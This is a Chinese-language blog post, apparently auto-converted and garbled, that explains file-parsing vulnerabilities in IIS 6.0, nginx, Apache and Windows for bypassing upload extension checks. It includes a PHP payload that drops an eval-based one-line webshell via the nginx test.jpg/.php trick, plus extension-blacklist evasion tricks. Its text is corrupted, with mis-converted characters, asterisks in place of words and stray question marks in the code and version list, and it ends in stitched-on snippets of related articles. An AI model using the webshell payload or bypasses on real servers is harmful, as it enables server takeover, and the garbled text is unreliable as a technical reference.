檔案解析漏洞

2022-08-09 21:15:25 字數 679 閱讀 8714

1.目錄解析(在asp檔案字尾的檔案可以以asp的格式被解析)

2.檔案解析(以前可以繞狗和策略)

nginx解析漏洞是由我國安全組織80sec發現

在預設fast-cgi開啟狀況下,上傳乙個test.jpg,內容為

<?php fputs(fopen('shell.php','w')>,'<?php?eval($_post[cmd]?>');?>

直接訪問test.jpg/.php,則會在這個目錄下生成乙個一句話木馬shell.php

影響:0.5. 0.6. ?0.7?<=?0.7.65 ?0.8?<=?0.8.37

nginx在中嵌入php**然後通過訪問

apache是從右往左進行解析,如果不能解析,就往前跳,再進行識別解析。

那麼可以寫 test,php.owf.rar 後面兩個字尾名,apache是無法識別的,所以最終跳到前面的php字尾進行解析。

判斷是不是合法的字尾,就只能乙個個進行嘗試看看是否能成功。

在windows環境,test.jpg[空格]或者test.jpg. 這兩類都是不被允許的,windows會自動消除多餘的空格或者點繞過黑名單。

以及上一章節的,htaccess檔案也可以視作乙個解析,不多贅述。

兩種檔案解析漏洞Apache檔案解析漏洞

用.做分隔符 如某檔名為 werner.html.qwe.arex,apache在處理時,先讀取最後乙個字尾,為 arex 一看,這啥玩意啊,不認識,繼續讀取下乙個字尾 qwe 一看,呀,這又是啥,還是不認識,繼續讀下乙個字尾 html 一看,哦,這是個超文字標記語言檔案,俗稱網頁檔案,這回認識了,...

檔案解析漏洞總結

伺服器解析漏洞算是歷史比較悠久了,但如今依然廣泛存在。在此記錄彙總一些常見伺服器 web server 的解析漏洞,比如iis6.0 iis7.5 apache nginx等方便以後回顧溫習。使用iis5.x 6.x版本的伺服器,大多為windows server 2003,比較古老,開發語句一般為...

檔案解析漏洞總結

iis?6.0解析利用方法有兩種 1.目錄解析 2.檔案解析 第一種,在 下建立資料夾的名字為?asp asa?的資料夾,其目錄內的任何副檔名的檔案都被iis當作asp檔案來解析並執行。例如建立目錄?pamela.asp,那麼 將被當作asp檔案來執行。假設黑闊可以控制上傳資料夾路徑,就可以不管你上...